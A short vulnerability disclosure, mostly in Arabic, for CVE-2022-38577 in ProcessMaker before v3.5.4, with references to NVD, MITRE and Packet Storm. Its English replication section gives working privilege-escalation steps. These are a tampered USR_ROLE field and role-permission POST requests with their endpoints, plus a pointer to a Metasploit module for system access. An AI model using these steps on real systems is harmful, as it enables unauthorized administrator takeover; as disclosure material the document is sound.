
اكتُشف أن ProcessMaker قبل الإصدار v3.5.4 يحتوي على أذونات غير آمنة في صفحة الملف الشخصي للمستخدم. تسمح هذه الثغرة للمهاجمين بترقية المستخدمين العاديين إلى مسؤولين.
تم أرشفة هذا المستودع ونقله إلى: https://github.com/sornram9254/CVE-BBP-VDP
تم اكتشاف أن ProcessMaker قبل الإصدار v3.5.4 يحتوي على أذونات غير آمنة في صفحة ملف تعريف المستخدم. تسمح هذه الثغرة للمهاجمين بتصعيد المستخدمين العاديين إلى مسؤولين.
* يمكن استخدام هذا الاستغلال مع وحدة Metasploit (ProcessMaker Plugin Upload) - exploit/multi/http/processmaker_plugin_upload للحصول على وصول للنظام.
Privilege Escalation replication.
for 2.5.0 - 3.0 GA:
1. Log in as normal user.
2. Change "USR_ROLE" on post request form when updating profile information to "PROCESSMAKER_ADMIN".
3. Refresh page to get new role.
for 3.2.1 and before:
1. Log in as normal user.
2. Get Role ID by request "/sysworkflow/en/neoclassic/roles/roles_Ajax?request=rolesList&_dc={epoch_time}"
3. Get Permission ID by request "/sysworkflow/en/neoclassic/roles/data_rolesPermissions?rUID={Role_ID}&type=show"
4. Update role to escalation privileges using POST Body request:
POST /sysworkflow/en/neoclassic/roles/roles_Ajax
request=assignPermissionToRoleMultiple&ROL_UID={Role_ID}&PER_UID={PERMISSION_ID}
المراجع:
[x] https://nvd.nist.gov/vuln/detail/CVE-2022-38577
[x] https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-38577
[x] https://packetstormsecurity.com/files/168427/ProcessMaker-Privilege-Escalation.html
[x] https://drive.google.com/file/d/1iP9NYUkYEy_FGMpcnTkUWn8nGcqDT02_/view?usp=sharing